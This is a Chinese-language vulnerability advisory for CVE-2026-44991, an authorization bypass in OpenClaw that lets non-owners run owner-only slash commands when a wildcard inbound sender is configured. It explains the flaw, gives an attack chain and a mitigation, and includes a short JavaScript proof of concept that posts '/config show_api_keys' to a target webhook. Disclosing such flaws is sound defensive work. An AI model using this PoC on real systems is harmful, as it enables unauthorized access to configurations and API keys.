CVE-2026-44991 OpenClaw 权限绕过漏洞

漏洞信息

漏洞编号

CVE-2026-44991

漏洞类型

权限绕过

CVSS评分

4.2 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.4.21 之前版本存在授权绕过漏洞。在 command-auth.ts 中，当配置了通配符入站发送者但未显式设置所有者 allowFrom 时，非所有者可执行所有者强制命令（如 /send, /config, /debug），导致安全风险。

技术细节

该漏洞源于 OpenClaw 在处理命令授权时的逻辑缺陷。在受影响的版本中，command-auth.ts 文件未能正确验证命令发送者的权限。具体而言，当管理员配置了通配符作为入站消息发送者以方便接收消息，却未在 allowFrom 列表中显式指定所有者身份时，系统会错误地将通配符匹配范围应用于所有者级别的命令。这使得拥有低权限（PR:L）的攻击者无需用户交互（UI:N），即可通过网络（AV:N）向受影响通道发送特定指令（如 /send, /config, /debug）。攻击者利用此漏洞可绕过原本仅限所有者执行的强制授权检查，导致系统机密性（C:L）和完整性（I:L）受损。

攻击链分析

STEP 1

侦察阶段

攻击者识别目标使用的是存在漏洞的 OpenClaw 版本，并检测到其配置了通配符入站发送者。

STEP 2

漏洞利用

攻击者向受影响的通道发送特制的消息，包含所有者强制执行的斜杠命令（如 /config 或 /send）。

STEP 3

权限绕过

由于 command-auth.ts 逻辑缺陷，系统未验证发送者是否为显式所有者，错误地批准了命令执行。

STEP 4

达成影响

攻击者成功执行敏感操作，导致配置泄露或系统完整性受损。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2026-44991: OpenClaw Authorization Bypass // Exploit: Sending owner-enforced commands via wildcard sender const axios = require('axios'); const targetUrl = 'https://target-openclaw-instance.com/api/webhook'; // Malicious payload attempting to execute owner-only command const exploitPayload = { sender: '[email protected]', message: '/config show_api_keys' // Command restricted to owner }; axios.post(targetUrl, exploitPayload) .then(response => { console.log('[+] Command executed successfully:', response.data); }) .catch(error => { console.error('[-] Exploit failed:', error.message); });

影响范围

OpenClaw < 2026.4.21

防御指南

临时缓解措施

如果无法立即升级，请检查 OpenClaw 的配置文件，确保移除通配符入站发送者设置，并严格限制 allowFrom 为特定的所有者 ID，以防未授权命令执行。